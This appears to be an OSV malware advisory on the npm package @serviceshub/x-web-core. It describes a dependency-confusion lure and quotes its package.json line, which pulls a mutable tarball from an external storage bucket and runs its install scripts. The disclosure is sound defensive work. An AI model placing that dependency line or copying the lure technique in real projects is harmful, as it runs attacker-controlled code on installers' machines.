@serviceshub/x-web-core@99.9.1
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 4:30 AM UTC
OSV ID
MAL-2026-4440
Ecosystem
npm
Summary
The package ships a trivial index.js (module.exports = {};) and exists solely to pull a direct-URL tarball dependency at install time. package.json line 9 declares "ltidisafe": "https://ltidi.storage.googleapis.com/depenconf/ltidisafe-2.3.9.tgz": a tarball hosted outside the npm registry, with no integrity hash in the specifier and served from a mutable bucket object, so it bypasses registry-side auditing entirely. The bucket path literally contains the string depenconf, suggestive of "dependency confusion".

On npm install, npm fetches the GCS tarball, extracts it into node_modules, and runs any lifecycle scripts it declares (preinstall, install, postinstall) on the installer's machine; the author can swap the tarball bytes at any time without changing the specifier. Setting ignore-scripts=true in .npmrc (or passing --ignore-scripts) stops the lifecycle scripts, but the fetched code still executes once the consuming application requires it, and a lockfile only records the hash of whatever was fetched the first time, so a fresh resolve without one gets whatever the bucket currently serves.

Corroborating signals: the version is inflated to 99.9.1 on a brand-new scope, so it outranks any legitimate version during resolution; the description and author fields are empty; and the main module has no functionality matching the package's x-web-core name. The package itself is a lure whose only effect on install is to pull attacker-controlled, non-registry, mutable code into the installer's dependency tree.
Source: amazon-inspector (1cd81c2623e8f621801dcbfbf7d7eb8745bf702f1d5e85e410872400c7d2eea7)